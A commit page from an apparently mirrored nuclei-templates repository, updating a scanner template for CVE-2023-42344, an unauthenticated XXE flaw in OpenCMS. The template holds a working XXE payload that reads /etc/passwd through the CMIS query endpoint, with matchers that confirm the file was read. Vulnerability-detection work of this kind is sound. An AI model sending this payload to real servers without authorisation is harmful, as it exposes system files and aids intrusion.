daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

minor update

patch-1
Dhiyaneshwaran 2024-02-22 12:38:41 +05:30 committed by GitHub
parent 80386b6582
commit 46c1718962
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 11 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
http/cves/2023/CVE-2023-42344
View File

@ -1,18 +1,20 @@
id: CVE-2023-42344
info:
name: Unauthenticated XXE
name: OpenCMS - Unauthenticated XXE
author: x0xr2r
severity: high
description: |
users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.
remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
reference:
- https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
- https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
metadata:
verified: true
max-request: 1
fofa-query: "OpenCms-9.5.3"
verified: true
tags: cve,cve2023,redirect,opencms
tags: cve,cve2023,xxe,opencms
http:
- method: POST
@ -20,20 +22,17 @@ http:
- "{{BaseURL}}/opencms/cmisatom/cmis-online/query"
- "{{BaseURL}}/cmisatom/cmis-online/query"
headers:
Content-Type: application/cmisquery+xml
Content-Type: "application/xml;charset=UTF-8"
Referer: "{{RootURL}}"
body: |
<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis="<http://docs.oasis-open.org/ns/cmis/core/200908/>"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
- type: regex
part: body
words:
- "root:x:"
- "javax.xml.bind.UnmarshalException"
regex:
- "root:.*:0:0:"
- "invalidArgument"
condition: and
- type: status
status:
- 400